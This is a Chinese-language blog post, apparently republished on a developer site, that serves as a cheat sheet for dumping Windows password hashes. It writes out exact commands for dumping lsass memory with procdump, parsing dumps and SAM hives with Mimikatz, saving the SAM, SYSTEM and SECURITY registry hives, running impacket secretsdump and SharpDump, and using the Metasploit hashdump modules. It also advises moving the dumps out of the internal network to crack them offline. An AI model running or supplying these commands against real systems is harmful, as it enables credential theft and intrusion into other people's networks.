常用 Windows 抓取Hash

栏目: 数据库 · 发布时间: 6年前

内容简介:测试机器: Windows 10 1809Procdump(管理员权限下运行)

推荐使用 Procdump,reg 和 sharpdump 导出本地,再想办法从内网中运出来本地破解

测试机器: Windows 10 1809

0x01 Procdump + Mimikatz

Procdump

(管理员权限下运行)

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits

常用 Windows 抓取Hash

然后本地解出hash即可

sekurlsa::minidump C:\lsass.dmp
sekurlsa::logonpasswords full

常用 Windows 抓取Hash

0x02 Reg + impacket/Mimikatz (强推)

使用 Reg 需要NT/SYSTEM权限

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save HKLM\security security.hiv

Mimikatz 调用 lsadump

lsadump::sam /system:system.hiv /sam:sam.hiv

常用 Windows 抓取Hash

impacket/secretsdump.py

python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

常用 Windows 抓取Hash

0x03 Sharpdump (强推)

Out-Minidump.ps1 的 C#版本 编译结果

需要.NET 3.5版本框架

常用 Windows 抓取Hash

0x04 Wce、Quarks PwDump、GetPass……

没怎么用过,都是以前比较老的,Getpass是Mimikatz的编译版本,没啥意思

0x05 Msf modules

hashdump

条件:

  1. Meterpreter Session
  2. NT/SYSTEM

常用 Windows 抓取Hash

hashdump只能dump本地用户

smart_hashdump

条件

  1. Meterpreter Session
  2. NT/SYSTEM

常用 Windows 抓取Hash

可以dump本地 + 域用户hash


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

IT大败局

IT大败局

Merrill R.Chapman、周良忠 / 周良忠 / 电子工业出版社 / 2004-8-1 / 35.00

这是一本由作者亲身经历写就的MBA式教案。通过作者那专业人士的敏锐、活泼流畅的文笔和美国人特有的幽默,本书为我们剖析了IT界十个有代表性且影响深远的愚蠢败局。这十个败局涉及企业经营的十个主要方面,它们是:产业标准的魔力,“缩水”产品的阴霾,产品定位的泥潭,市场关系的教训,巨型企业的困惑,企业并购的陷阱,品牌战略的迷茫,技术导向的失衡,企业公关的真谛和科技虚幻的诱惑。 书中有许多鲜为人......一起来看看 《IT大败局》 这本书的介绍吧!

SHA 加密
SHA 加密

SHA 加密工具

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换